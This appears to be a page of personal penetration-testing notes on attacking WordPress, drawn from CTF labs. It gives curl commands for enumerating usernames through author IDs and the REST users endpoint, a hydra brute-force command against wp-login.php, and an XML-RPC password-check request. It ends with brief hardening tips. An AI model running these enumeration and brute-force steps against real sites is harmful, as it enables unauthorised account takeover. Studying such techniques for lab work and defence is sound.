search
LinkedInGithub
githubEdit

method

hashtag
Username enum

MEHTOD 1

#Check out the posts
curl -s -I http://"$domain"/?author=1
#Change author value to get username
# Automation Script
curl -s "$ip" | grep 'class=\"wp-block-post-author-name' | awk -F __link\"\> '{print $2}' | awk -F \</a\> '{print $1}'

METHOD 2 (JQ)

curl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq
index.php/wp-json/wp/v2/users/?per_page=100&page=1

METHOD 3 (hydra)

hydra -L /usr/share/seclists/Usernames/cirt-default-usernames.txt -p admin@123 "http-post-form://"$domain"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.bigbang.htb%2Fwp-admin%2F&testcookie=1:F=not registered on this site"

hashtag
Login brute-force XMLRPC

Manual

curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://"$domain"/xmlrpc.php
#403 - wrong password

Automatic with tool

hashtag
Is XMLRPC enabled?

CTF: HTB: Pressed | 0xdf hacks stuff

Get list of methods

Use methods

Interact with XMLRPC using python

hashtag
Remote code execution (required credentials)

Payload

Exploit

Run commands

hashtag
Leveraging known vulnerabilities

hashtag
WordPress hardening

Update WordPress to the latest version

WordPress security plugins

PreviousfindingNextWordpress

Last updated